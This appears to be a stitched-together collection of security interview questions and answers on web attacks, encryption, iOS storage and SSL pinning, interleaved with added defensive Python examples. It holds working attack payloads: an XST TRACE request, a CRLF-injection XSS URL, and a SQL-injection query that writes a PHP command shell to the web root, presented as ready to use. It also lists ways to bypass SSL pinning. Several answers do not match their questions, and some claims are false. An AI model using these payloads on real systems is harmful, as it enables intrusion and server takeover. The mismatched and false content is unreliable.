Closed Port:
- If you send a SYN to a closed port, it will respond with a RST.
Open Port:
- If you send a SYN to an open port, you would expect to receive a SYN/ACK.
Filtered Port:
- Presumably, the host is behind some sort of firewall. If the packet is discarded and there is no response, this is typically considered a filtered port.
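As an added example (not part of the original document), the following Python parses a raw TCP header and classifies a SYN probe's reply into the three states just described, the way you would when reading firewall or sniffer output. The reply segments are constructed inline rather than captured, and `classify_probe_response`, `build_tcp_segment` and the `icmp_unreachable` flag are this example's own names.

```python
import struct
from typing import Optional

# Flag bits of the 13th byte of the TCP header (RFC 793 layout).
FLAG_FIN = 0x01
FLAG_SYN = 0x02
FLAG_RST = 0x04
FLAG_ACK = 0x10


def build_tcp_segment(src_port: int, dst_port: int, flags: int) -> bytes:
    """Construct a minimal 20-byte TCP header (no options, no payload) for samples."""
    data_offset = 5 << 4  # header length of 5 words, reserved bits zero
    return struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0,
                       data_offset, flags, 65535, 0, 0)


def parse_tcp_header(segment: bytes) -> dict:
    """Parse the fixed part of a TCP header (no IP header in front of it)."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    src, dst, seq, ack, off, flags, window, _csum, _urg = struct.unpack(
        "!HHIIBBHHH", segment[:20])
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "header_len": (off >> 4) * 4, "flags": flags, "window": window}


def classify_probe_response(response: Optional[bytes],
                            icmp_unreachable: bool = False) -> str:
    """Map what came back after a SYN to open / closed / filtered."""
    # No reply at all, or an ICMP unreachable instead of TCP: a filter dropped it.
    if icmp_unreachable or response is None:
        return "filtered"
    flags = parse_tcp_header(response)["flags"]
    if flags & FLAG_RST:                      # closed ports answer RST (usually RST/ACK)
        return "closed"
    if flags & (FLAG_SYN | FLAG_ACK) == (FLAG_SYN | FLAG_ACK):
        return "open"                         # open ports complete step 2 of the handshake
    return "unexpected"


# Constructed sample replies to a SYN probe sent from port 40000 to port 80
SYN_ACK_REPLY = build_tcp_segment(80, 40000, FLAG_SYN | FLAG_ACK)
RST_REPLY = build_tcp_segment(80, 40000, FLAG_RST | FLAG_ACK)

if __name__ == "__main__":
    for name, reply in [("SYN/ACK", SYN_ACK_REPLY), ("RST", RST_REPLY), ("none", None)]:
        print(f"{name:8} -> {classify_probe_response(reply)}")
```

A real scanner also treats ICMP type 3 unreachable messages as "filtered"; that is what the `icmp_unreachable` flag stands in for here.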
Step 4
The next step is to configure your firewall rules for remote access.
54) What is more important for cybersecurity professionals to focus on, threats or vulnerabilities?
These goals form the confidentiality, integrity, availability (CIA) triad, the basis of all security
programs. Information security professionals who create policies and procedures must
consider each goal when creating a plan to protect a computer system.
2. Integrity: This means that whenever a document, whether stored beforehand or new, needs to be changed, the change can only be made by an authorized person through a proper and secure mechanism.
3. Threat: Something that can exploit a vulnerability, either knowingly or by accident, in order to damage or destroy personal or official data.
57) What is the difference between Vulnerability Assessment and Penetration Testing?
There is a considerable amount of confusion in the industry regarding the differences
between vulnerability scanning and penetration testing, as the two phrases are commonly
interchanged. However, their meaning and implications are very different. A vulnerability
assessment simply identifies and reports noted vulnerabilities, whereas a penetration test
(Pen Test) attempts to exploit the vulnerabilities to determine whether unauthorized access
or other malicious activity is possible.
58) What is Vulnerability Assessment?
Penetration testing (also called pen testing) is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker could exploit.
Pen tests can be automated with software applications or they can be performed manually.
Either way, the process includes gathering information about the target before the test
(reconnaissance), identifying possible entry points, attempting to break in (either virtually
or for real) and reporting back the findings.
XST (Cross Site Tracing) is a combined attack that uses the HTTP TRACE method together with XSS techniques.
How to test if your server is vulnerable to XST:
To test whether your server is vulnerable I will use Burp Suite. Open Burp, choose Repeater and change the request to something similar to:
TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>
The reply should look like this if TRACE is enabled:
HTTP/1.1 200 OK
Date: Sun, 23 Sep 2007 02:48:05 GMT
Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29
Connection: close
Content-Type: message/http
TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>
As we can see, the TRACE request is echoed in the response, so this method is allowed. Now let's try to add a new header and see whether it is echoed too, using curl's -H option.
The injected header comes back in the response, so this application is prone to XSS attacks via the TRACE method, which in short is called Cross Site Tracing. If we don't see the TRACE request echoed in the response and instead get a normal page, then the TRACE method is disabled.
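The following Python is an added example, not code from the original document: it sends the same TRACE probe as above but with a harmless canary header instead of a script tag, and decides whether TRACE is enabled by checking that the server echoed the request back with Content-Type message/http. The sample responses are constructed to resemble the Apache reply shown above and were not captured from a real host; `check_host`, `trace_reflected` and the X-Xst-Canary header name are this example's own.

```python
import secrets
import socket

CANARY_HEADER = "X-Xst-Canary"


def build_trace_request(host: str, canary: str) -> bytes:
    """Minimal TRACE request carrying a random, harmless marker header."""
    return ("TRACE / HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            f"{CANARY_HEADER}: {canary}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def trace_reflected(response: bytes, canary: str) -> bool:
    """True when the server echoed our request back, i.e. TRACE is enabled."""
    head, _, body = response.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0]
    if not status.startswith(b"HTTP/") or b" 200 " not in status:
        return False                      # 405 / 501 etc.: TRACE refused
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    # A genuine echo has message/http content and starts with our own request line.
    echoed = body.startswith(b"TRACE ") and canary.encode("ascii") in body
    return headers.get(b"content-type", b"").startswith(b"message/http") and echoed


def check_host(host: str, port: int = 80, timeout: float = 5.0) -> bool:
    """Network version: probe one of your own servers and report whether TRACE is on."""
    canary = "xst-" + secrets.token_hex(4)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_trace_request(host, canary))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return trace_reflected(b"".join(chunks), canary)


# Constructed sample responses (modelled on the Apache reply above, not captured)
SAMPLE_CANARY = "xst-0badc0de"
ENABLED_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                    b"Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29\r\n"
                    b"Connection: close\r\n"
                    b"Content-Type: message/http\r\n\r\n"
                    + build_trace_request("example.test", SAMPLE_CANARY))
DISABLED_RESPONSE = (b"HTTP/1.1 405 Method Not Allowed\r\n"
                     b"Allow: GET, HEAD, POST\r\n"
                     b"Content-Type: text/html\r\n\r\n"
                     b"<html><body>Method not allowed</body></html>")
PAGE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>home</html>"

if __name__ == "__main__":
    print("enabled sample :", trace_reflected(ENABLED_RESPONSE, SAMPLE_CANARY))
    print("disabled sample:", trace_reflected(DISABLED_RESPONSE, SAMPLE_CANARY))
```

The canary is what makes the check reliable: a server that returns a 200 page for unknown methods is not "enabled", and the check above only reports true when the marker it sent comes back in a message/http body.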
Defenses
Prevention of this vulnerability is really simple. If you are using Apache, you need the mod_rewrite module enabled. Add the following lines to your httpd.conf file:
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
If you are using IIS, you need to filter out everything but GET, POST and HEAD with UrlScan.
61) What is Self XSS?
Self-XSS is a popular social engineering attack used by attackers to trick users into pasting malicious code into their browser. The result is that the attacker gains access to whatever website you are visiting. Scammers usually use this attack to trick users into buying products or to make money through online surveys.
JavaScript can be executed from the browser URL bar.
For example, enter the following code in your browser:
javascript:alert('BreakTheSecurity');
This will show a pop-up box with "BreakTheSecurity". An attacker can use this for malicious purposes: stealing confidential data or cookies, redirecting you to malware sites and more.
For example:
Entering the following code will display the cookies in your browser:
javascript:alert("Cookies: " + document.cookie + "\nBy\nBreakTheSecurity");
The above code does nothing malicious other than displaying the cookies, but an attacker can extend the script so that it takes advantage of your data.
Security tips from BreakTheSecurity:
- Use the NoScript add-on, which prevents JavaScript from running in your browser.
- Don't click shortened URLs, for example bit.ly/55ewEb?22. They may redirect you to infected sites.
- If anyone asks you (even if he is your friend) to paste a script into the browser bar, never do it.
- If anyone says "iPhone only $10", don't be eager to click it.
- If anyone says "1000 shares will cure a baby", never do it. Facebook shares never raise money or cure a baby.
Read our EHN spam report to know the latest updates about the Facebook scams.
It tricked the user into "Liking" an item on Facebook. Clickjacking has also been used in the past to:
- Harvest login credentials, by rendering a fake login box on top of the real one.
- Trick users into turning on their web-cam or microphone, by rendering invisible elements over the Adobe Flash settings page.
- Spread worms on social media sites like Twitter and MySpace.
- Promote online scams by tricking people into clicking on things they otherwise would not.
- Spread malware by diverting users to malicious download links.
Also, when a web site is vulnerable to clickjacking, it is possible for the attacker to disable cross-site request forgery (CSRF) token protection, which protects against CSRF attacks that trick browsers into doing things without the user's knowledge or permission.
ClickJacking as a method of delivery for Blind XSS.
This vulnerability can be linked to a multitude of attacks including keylogging and stealing
user credentials.
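Since the clickjacking discussion above stops at impact, here is an added Python check (not from the original document) that a defender can run over a site's response headers to see whether framing is restricted: it parses a Content-Security-Policy header for the frame-ancestors directive, which browsers honour over X-Frame-Options when both are present, and falls back to X-Frame-Options otherwise. The header sets are constructed samples; `frame_protection` and `parse_csp` are this example's own names.

```python
from typing import Dict, List


def parse_csp(value: str) -> Dict[str, List[str]]:
    """Parse a Content-Security-Policy value into {directive: [source, ...]}."""
    policy: Dict[str, List[str]] = {}
    for directive in value.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def frame_protection(headers: Dict[str, str]) -> str:
    """Return 'protected', 'partial' or 'unprotected' for a set of response headers."""
    lower = {name.lower(): value for name, value in headers.items()}
    csp = parse_csp(lower.get("content-security-policy", ""))
    if "frame-ancestors" in csp:
        # frame-ancestors takes precedence over X-Frame-Options in browsers that support CSP
        sources = [s.strip("'").lower() for s in csp["frame-ancestors"]]
        if "*" in sources:
            return "unprotected"          # anyone may frame the page
        if set(sources) <= {"none", "self"}:
            return "protected"
        return "partial"                  # an allow-list: review each listed origin
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "protected"
    if xfo.startswith("ALLOW-FROM"):
        return "partial"                  # obsolete syntax, ignored by modern browsers
    return "unprotected"


# Constructed sample header sets (not captured from a real site)
NO_HEADERS = {"Content-Type": "text/html"}
XFO_ONLY = {"Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN"}
CSP_NONE = {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"}
CSP_WILDCARD = {"Content-Security-Policy": "frame-ancestors *",
                "X-Frame-Options": "DENY"}

if __name__ == "__main__":
    for label, hdrs in [("none", NO_HEADERS), ("xfo", XFO_ONLY),
                        ("csp none", CSP_NONE), ("csp *", CSP_WILDCARD)]:
        print(f"{label:9} -> {frame_protection(hdrs)}")
```

The `CSP_WILDCARD` sample is the case worth remembering: an X-Frame-Options: DENY header does not help once a CSP with `frame-ancestors *` is also sent, because the CSP directive wins.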
63) What is Blind XSS?
It is a type of stored XSS where the attacker's input is saved by the server and is rendered in a totally different application used by a system admin or team member.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking a user's active session.
- Mounting phishing attacks.
- Intercepting data and performing man-in-the-middle attacks.
64) What is CRLF or HTTP Response splitting?
When a browser sends a request to a web server, the web server answers back with a
response containing both the HTTP headers and the actual website content. The HTTP
headers and the HTML response (the website content) are separated by a specific
combination of special characters, namely a carriage return and a line feed. For short they
are also known as CRLF.
The server knows when a new header begins and another one ends with CRLF, which can
also tell a web application or user that a new line begins in a file or in a text block.
In a CRLF injection attack the attacker inserts both the carriage return and line feed characters into user input to trick the server, web application or user into thinking that an object is terminated and another one has started.
A CRLF injection vulnerability is a web application vulnerability that happens when user-entered data is passed directly into response header fields (Location, Set-Cookie, etc.) without proper sanitisation, which can result in various forms of security exploits. These exploits range from XSS, cache poisoning and cache-based defacement to page injection and so on.
CRLF injection, or HTTP response splitting, is a type of injection attack that can lead to Cross-
site Scripting (XSS) and web cache poisoning among others.
CRLF refers to the Carriage Return and Line Feed sequence of special characters. These two
special characters represent the End of Line (EOL) marker for many internet protocols,
including HTTP. Web applications typically split headers based on where the CRLF character
sequence is found. Therefore, if a malicious user is able to inject their own CRLF sequence
into an HTTP stream, they gain control over the contents of the HTTP response.
Since CRLF characters can be used to split an HTTP response header, it is often also referred
to as HTTP Response Splitting. The following example is a crafted request containing CRLF
(the %0d%0a characters in the request below) that causes Cross-site Scripting.
http://www.yoursite.com/somepage.php?page=%0d%0aContent-Type:
text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:
text/html%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
The victim will see the following in their browser.
<script>alert(1)</script>
Variations of this attack can be used to poison proxy or web caches in order to get the cache
to serve the attacker’s content to other users.
Impacts of the CRLF injection vulnerability
The impact of CRLF injection varies and includes all the impacts of Cross-site Scripting through to information disclosure. It can also deactivate certain security restrictions like XSS filters and the Same Origin Policy in the victim's browser, leaving them susceptible to malicious attacks.
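As an added illustration (not part of the original text), the Python below builds a redirect response in the naive way the section describes, with user input concatenated into the Location header, and parses the result the way a browser or proxy would, so you can see the injected CRLF pair end the headers and start a body; beside it is the hardened builder that rejects CR, LF and NUL in any header value. The payload is constructed in the style of the %0d%0a example above; `build_redirect_unsafe`, `build_redirect_safe` and `split_response` are this example's own names.

```python
from typing import List, Tuple
from urllib.parse import unquote


class HeaderInjectionError(ValueError):
    """Raised when user input would break out of a header value."""


def safe_header_value(value: str) -> str:
    """Hardened: refuse any character that can terminate a header or the header block."""
    if any(ch in value for ch in "\r\n\x00"):
        raise HeaderInjectionError("CR, LF or NUL not allowed in a header value")
    return value


def is_rejected(value: str) -> bool:
    try:
        safe_header_value(value)
    except HeaderInjectionError:
        return True
    return False


def build_redirect_unsafe(location: str) -> bytes:
    """Vulnerable: the user-controlled value is pasted straight into the header block."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {location}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")


def build_redirect_safe(location: str) -> bytes:
    """Same response, but the value is validated first."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {safe_header_value(location)}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")


def split_response(raw: bytes) -> Tuple[List[Tuple[str, str]], bytes]:
    """Parse a raw response as a client does: headers end at the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.decode("latin-1").split("\r\n")[1:]:   # skip the status line
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers, body


# Constructed payload in the style of the page's %0d%0a example
PAYLOAD = unquote("/home%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
                  "%3Cscript%3Ealert(1)%3C/script%3E")

if __name__ == "__main__":
    hdrs, body = split_response(build_redirect_unsafe(PAYLOAD))
    print("unsafe headers:", hdrs)
    print("unsafe body   :", body[:30])
    print("safe rejects  :", is_rejected(PAYLOAD))
```

Running it shows the attacker's `Content-Type` landing among the headers and the script tag becoming the body, while the server's own `Content-Length` line is pushed into the body and ignored. Python's http.client applies the same rule as `safe_header_value`, refusing header values that contain CR or LF, as do most modern web frameworks; the check belongs at the exact point where user data becomes a header.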
65) How to Upload Shells from SQL injection?
File Upload with SQL Injection
If we find a Union-based SQL injection, we can upload a file to the server. To upload a file we need to know the directory structure, or root path, of the server, and usually we will see it in SQL errors.
Example SQL Error:
Warning: mysql_fetch_assoc() expects parameter 2 to be resource, boolean given in
C:\wamp\www\db_connect.php on line 136
In this example, the web server is running from "C:\wamp\www". The SQL query that writes a basic command shell is given below.
Example SQL Query:
select "<? system($_GET['cmd']); ?>" into outfile "C:/wamp/www/shell.php"
Now it’s time to merge the SQL query with the SQL injection.
File Upload Example:
URL : http://www.example.com/product.php?id=5 union all select "<? system($_GET['cmd']); ?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php" --
SQL Query : select * from products where id=5 union all select "<? system($_GET['cmd']); ?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php" --
The shell file is now ready to use; we can reach it at http://www.example.com/shell.php.
If command execution via SQL injection is not enough for you, try it with Metasploit.
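As an added example (not from the original document), the Python below reproduces the union injection shown above against an in-memory SQLite table and places it beside the parameterized version that defeats it: the vulnerable function pastes the id parameter into the SQL text, while the safe one validates the type and binds the value, so the query structure can never change. The table contents and the injected input are constructed; `product_unsafe`, `product_safe` and `make_db` are this example's own names. SQLite has no INTO OUTFILE, so only the union half of the attack is reproduced here.

```python
import sqlite3
from typing import List, Tuple

Row = Tuple[int, str, float]


def make_db() -> sqlite3.Connection:
    """In-memory products table standing in for the page's MySQL 'products' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(5, "Widget", 9.99), (6, "Gadget", 19.99)])
    return conn


def product_unsafe(conn: sqlite3.Connection, product_id: str) -> List[Row]:
    """Vulnerable: the URL parameter becomes part of the SQL text, so a UNION can be appended."""
    return conn.execute(
        f"SELECT id, name, price FROM products WHERE id={product_id}").fetchall()


def product_safe(conn: sqlite3.Connection, product_id: str) -> List[Row]:
    """Hardened: validate the type, then bind the value; the SQL text never changes."""
    try:
        pid = int(product_id)
    except ValueError:
        return []                        # not a product id at all: reject, do not query
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id=?", (pid,)).fetchall()


# Constructed input in the shape of the page's union probe (literals instead of a payload)
INJECTED = "5 union all select 1,2,3"

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", product_unsafe(db, INJECTED))   # the attacker's row appears
    print("safe:  ", product_safe(db, INJECTED))     # []
```

On MySQL the file write itself also depends on the database account holding the FILE privilege and on the server's secure_file_priv setting, so a least-privileged application account is the second line of defence after parameterization.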
- MySQL is free to use; MS SQL requires a paid license.
- MySQL uses less disk space; MS SQL uses more disk space.
- MySQL is cross-compatible with other platforms such as Unix and Linux.
- MS SQL is not compatible with other platforms.
- MySQL does not support foreign keys while MS SQL supports their use.
67) What is a buffer overflow attack?
A buffer overflow, or buffer overrun, is a common software coding mistake that an attacker
could exploit to gain access to your system.
A buffer overflow occurs when more data are written to a buffer than it can hold. The excess
data is written to the adjacent memory, overwriting the contents of that location and causing
unpredictable results in a program. Buffer overflows happen when there is improper validation (no bounds checking) prior to the data being written. It is considered a bug or weakness in the software.
A buffer is a temporary area for data storage. When more data (than was originally allocated
to be stored) gets placed by a program or system process, the extra data overflows. It causes
some of that data to leak out into other buffers, which can corrupt or overwrite whatever
data they were holding.
In a buffer-overflow attack, the extra data sometimes holds specific instructions for actions
intended by a hacker or malicious user; for example, the data could trigger a response that
damages files, changes data or unveils private information.
This vulnerability can cause a system crash or, worse, create an entry point for a cyberattack.
Programs written in C and C++ are more susceptible to buffer overflows.
Attackers can exploit a buffer overflow bug by injecting code that is specifically tailored to
cause buffer overflow with the initial part of a data set, then writing the rest of the data to
the memory address adjacent to the overflowing buffer. The overflow data might contain
executable code that allows the attackers to run bigger and more sophisticated programs or
grant themselves access to the system.
There are two types of buffer overflows: stack-based and heap-based. Heap-based, which are
difficult to execute and the least common of the two, attack an application by flooding the
memory space reserved for a program. Stack-based buffer overflows, which are more
common among attackers, exploit applications and programs by using what is known as a
stack: memory space used to store user input.
68) What are Encryption, Decryption, Key & Steganography?
Encryption: It is the process of locking up information using cryptography. Information that
has been locked this way is encrypted.
Decryption: The process of unlocking the encrypted information using cryptographic
techniques.
Key: A secret like a password used to encrypt and decrypt information. There are a few
different types of keys used in cryptography.
Steganography: It is actually the science of hiding information from people who would snoop
on you. The difference between steganography and encryption is that the would-be snoopers
may not be able to tell there’s any hidden information in the first place.
69) What are differences between Symmetric & Asymmetric Encryption?
Symmetrical Encryption
This is the simplest kind of encryption, involving only one secret key to cipher and decipher information. Symmetric encryption is an old and well-known technique. It uses a secret key that can be a number, a word or a string of random letters. This key is blended with the plain text of a message to change the content in a particular way. Both the sender and the recipient must know the secret key that is used to encrypt and decrypt all the messages. Blowfish, AES, RC4, DES, RC5 and RC6 are examples of symmetric encryption. The most widely used symmetric algorithms are AES-128, AES-192 and AES-256.
The main disadvantage of the symmetric key encryption is that all parties involved have to
exchange the key used to encrypt the data before they can decrypt it.
Asymmetrical Encryption
Asymmetric encryption is also known as public key cryptography, which is a relatively new method compared to symmetric encryption. Asymmetric encryption uses two keys to encrypt a plain text. Secret keys are exchanged over the Internet or a large network, and the scheme ensures that malicious persons cannot misuse the keys. It is important to note that anyone with the secret key can decrypt the message, and this is why asymmetric encryption uses two related keys to boost security. A public key is made freely available to anyone who might want to send you a message. The second, private key is kept secret so that only you know it.
A message that is encrypted using a public key can only be decrypted using the private key, and likewise a message encrypted using a private key can be decrypted using the public key. Security of the public key is not required because it is publicly available and can be passed over the internet. Asymmetric encryption is far better at ensuring the security of information transmitted during communication.
To use asymmetric encryption, there must be a way of discovering public keys. One typical technique is using digital certificates in a client-server model of communication. A certificate is a package of information that identifies a user or a server. It contains information such as the organization's name, the organization that issued the certificate, the user's email address and country, and the user's public key.
When a server and a client require a secure encrypted communication, they send a query
over the network to the other party, which sends back a copy of the certificate. The other
party’s public key can be extracted from the certificate. A certificate can also be used to
uniquely identify the holder.
SSL/TLS uses both asymmetric and symmetric encryption; let's quickly look at digitally signed certificates issued by trusted certificate authorities (CAs).
Contents in an IPA
Payload - Contains the .app folder of the specific iOS application. Under the .app folder we can see the application's contents like the images, nib files (which store the user interface) and so on.
Mach-O Executable - Mach Object is the file format for executables. It contains a header, load commands and data sections.
Info.plist - Stores the configuration information of the executable. It can be viewed with a text editor; if it is in binary format, it can be converted using:
plutil -convert xml1 Info.plist
Frameworks - Folder with the libraries the application uses. There are many third-party libraries, for example the AWS SDK.
Mobileprovision - Information such as the developer certificate, the devices for which the application is provisioned or the team identifier can be found under embedded.mobileprovision
72) What are the types of local storages in an iOS application?
Here we will explore local data storage guidelines for iOS apps that need to keep certain information locally. Local storage is meant for retaining web app data locally using frameworks, tools and methods specific to each platform. For iOS storage there are different methods to choose from; the choice, however, depends on what and how much data you want to store. Most of the time more than one method is required to implement local storage in iOS apps, as an application has different persistence needs, viz. data gathered from web browsing, user preferences and application settings. The most widely used methods for local storage implementation in iOS are:
- SQLite
- Property List
- Core Data
- NSUserDefaults
- Keychain
SQLite for iOS Local Data Storage
SQLite is a powerful, lightweight C library that is embedded in the iOS application. It is used in various applications across platforms including Android and iOS, and exposes an SQL-centric API to operate on the data tables directly. When using the SQLite C library for local data storage in iOS applications, one needs to be very meticulous when passing in the strings and arguments its functions require.
Property List
Another very common method of storing data in an iOS application is in property list files. A property list document contains either an NSDictionary or an NSArray, inside which there is archived data. There are a number of classes that can be archived into the plist, viz. NSArray, NSDate, NSString and NSDictionary. Objects other than these cannot be archived as a property list and writing the file will fail. One has to be very particular about the classes of the listed items; for instance, to store a Boolean or Integer only the NSNumber class is used. A Boolean or Integer must not be given directly to an NSDictionary or NSArray.
Core Data
Core Data is the method recommended by Apple for local storage of an app's data. By default, Core Data uses SQLite as its main database in the iOS app. Internally Core Data makes use of SQLite queries to save and store its data locally, which is why all the files are stored as .db files. This also eliminates the need to install a separate database. On iOS this framework allows two different storage types, but by default it is SQLite. Core Data lets you deal with common functionalities of an app like store, restore, undo and redo.
NSUserDefaults
NSUserDefaults is one of the most common methods of local data storage for saving application properties and user preferences. It is used to save the logged-in state of the user within an application, so that the app can fetch this data even when the user opens the application at some other time. In some iOS apps this method is used to save the user's confidential information, such as an access token.
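NSUserDefaults and the Info.plist described under "Contents in an IPA" are both property lists, so the same tooling inspects them. As an added example (not code from the original document), the Python below loads a plist in either XML or binary form with the standard plistlib module, which covers what the plutil -convert xml1 step above does, and walks it for keys whose names suggest secrets such as the access token this paragraph warns about. The defaults dictionary is a constructed sample, not taken from a real app; `find_sensitive_keys`, `audit_plist` and the SENSITIVE pattern are this example's own.

```python
import plistlib
import re
from typing import Any, Dict, List

# Key names that usually mean a secret is being stored in plain plist form
SENSITIVE = re.compile(r"(token|password|passwd|secret|session|api[_-]?key)", re.I)


def load_plist(data: bytes) -> Dict[str, Any]:
    """Parse a plist whether it is XML or binary; plistlib detects the format."""
    return plistlib.loads(data)


def find_sensitive_keys(obj: Any, path: str = "") -> List[str]:
    """Walk nested dicts/lists and return the key paths whose names look sensitive."""
    hits: List[str] = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            key_path = f"{path}/{key}"
            if SENSITIVE.search(str(key)):
                hits.append(key_path)
            hits.extend(find_sensitive_keys(value, key_path))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            hits.extend(find_sensitive_keys(value, f"{path}[{index}]"))
    return hits


def audit_plist(data: bytes) -> List[str]:
    """Convenience wrapper: parse the file and report suspicious keys."""
    return find_sensitive_keys(load_plist(data))


# Constructed sample resembling an app's NSUserDefaults plist (not from a real app)
SAMPLE_DEFAULTS = {
    "isLoggedIn": True,
    "username": "alice",
    "accessToken": "constructed-token-value",
    "settings": {"theme": "dark", "apiKey": "constructed-api-key"},
}
SAMPLE_BINARY = plistlib.dumps(SAMPLE_DEFAULTS, fmt=plistlib.FMT_BINARY)
SAMPLE_XML = plistlib.dumps(SAMPLE_DEFAULTS, fmt=plistlib.FMT_XML)

if __name__ == "__main__":
    print("binary plist flags:", audit_plist(SAMPLE_BINARY))
    print("xml plist flags   :", audit_plist(SAMPLE_XML))
```

Anything this reports is a candidate for moving into the Keychain; on a real device the defaults file lives unencrypted in the app's Library/Preferences directory, which is why the section says a token stored there is exposed.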
Keychain
Most of the time developers avoid implementing the Keychain method to save data, as the method follows a complicated procedure. If the device is jailbroken, none of your data is secure. On a non-jailbroken device, however, this is the most secure and reliable method to store data. Simple wrapper classes are used to store data using the Keychain.
73) What is SSL pinning?
SSL Pinning is making sure the client checks the server’s certificate against a known copy of
that certificate. Simply bundle your server’s SSL certificate inside your application, and make
sure any SSL request first validates that the server’s certificate exactly matches the bundle’s
certificate. SSL pinning prevents someone from using a false SSL certificate to breach the
trust between users, developers, and applications.
Typically, during the SSL or TLS handshake, when a client connects to a server, the server
sends its digital certificate. If the certificate is issued by a Certificate Authority that is trusted
by the mobile device OS, the connection is allowed. The data is sent through the connection,
and is encrypted with the server’s public key. This process establishes a trust relationship.
An attacker performing a "man in the middle" attack makes the mobile device trust the attacker's certificate. Typically, an attacker's certificate is not signed by a Certificate Authority trusted by the mobile device OS, but there is no certainty. In iOS 4.3.5, there was a vulnerability where "an attacker with a privileged network position" could capture or modify data in sessions that were protected by SSL/TLS.
BENEFITS
Increased security - with pinned SSL certificates, the app is independent of the device's trust store. Compromising the hard-coded trust store in the app is not so easy: the app would need to be decompiled, changed and then recompiled again, and it can't be signed using the same Android keystore that the original developer of the app used.
Reduced costs - SSL certificate pinning gives you the possibility to use a self-signed
certificate that can be trusted. For example, you’re developing an app that uses your own API
server. You can reduce the costs by using a self-signed certificate on your server (and pinning
that certificate in your app) instead of paying for a certificate. Although a bit convoluted, this
way, you've actually improved security and saved yourself some money.
DRAWBACKS
Less flexibility - when you do SSL certificate pinning, changing the SSL certificate is not that
easy. For every SSL certificate change, you have to make an update to the app, push it to
Google Play and hope the users will install it.
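To make the definition above concrete, here is an added Python example (not from the original document, and not any particular app's code) of the check that pinning adds: after the normal chain and hostname validation, the presented certificate's SHA-256 fingerprint must match one of a set of pinned fingerprints. Using a set rather than a single value is what lets you ship a backup pin ahead of a certificate change, which is the usual answer to the flexibility drawback listed above. The DER bytes in the offline sample are a constructed placeholder, not a real certificate; `pin_matches` and `connect_pinned` are this example's own names.

```python
import hashlib
import hmac
import socket
import ssl
from typing import Iterable


def cert_fingerprint(der: bytes) -> str:
    """SHA-256 fingerprint of a DER-encoded certificate, as lower-case hex."""
    return hashlib.sha256(der).hexdigest()


def pin_matches(der: bytes, pinned: Iterable[str]) -> bool:
    """True if the presented certificate matches any pinned fingerprint."""
    fingerprint = cert_fingerprint(der)
    # compare_digest keeps the comparison time independent of where the mismatch is
    return any(hmac.compare_digest(fingerprint, pin.lower()) for pin in pinned)


def connect_pinned(host: str, pinned: Iterable[str], port: int = 443,
                   timeout: float = 5.0) -> ssl.SSLSocket:
    """Open a TLS connection that passes normal CA validation AND the pin check."""
    ctx = ssl.create_default_context()            # chain + hostname validation as usual
    raw = socket.create_connection((host, port), timeout=timeout)
    tls = ctx.wrap_socket(raw, server_hostname=host)
    der = tls.getpeercert(binary_form=True)       # leaf certificate the server presented
    if der is None or not pin_matches(der, pinned):
        tls.close()
        raise ssl.SSLError(f"certificate presented by {host} matches no pinned fingerprint")
    return tls


# Constructed placeholder standing in for a real DER certificate (not a real cert)
SAMPLE_DER = b"constructed placeholder bytes, not a real DER certificate"
# Pin set as it would be shipped in the app: the current cert plus a backup pin.
# The backup value here is a placeholder; in practice it is the fingerprint of
# the next certificate, generated before the current one is rotated.
PINNED = {cert_fingerprint(SAMPLE_DER), "0" * 64}

if __name__ == "__main__":
    print("matches pin set:", pin_matches(SAMPLE_DER, PINNED))
    print("other cert     :", pin_matches(b"some other certificate", PINNED))
```

The pin check runs in addition to, not instead of, the platform's CA validation, so a leaked private key for a pinned certificate is still the one thing pinning cannot help with; rotating to the backup pin is the recovery path.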
74) How to bypass SSL pinning?
- Disable certificate pinning in code by decompiling the APK and compiling it again.
- Disable SSL pinning with a special tool installed on your phone (SSL Kill Switch).
- Disable SSL pinning with the IPAPatch tool for iOS.
- Adding a custom CA to the trusted certificate store.
- Overwriting a packaged CA cert with a custom CA cert.
- Using Frida to hook and bypass SSL certificate checks.
- Reversing custom certificate code.
75) What is AAA?
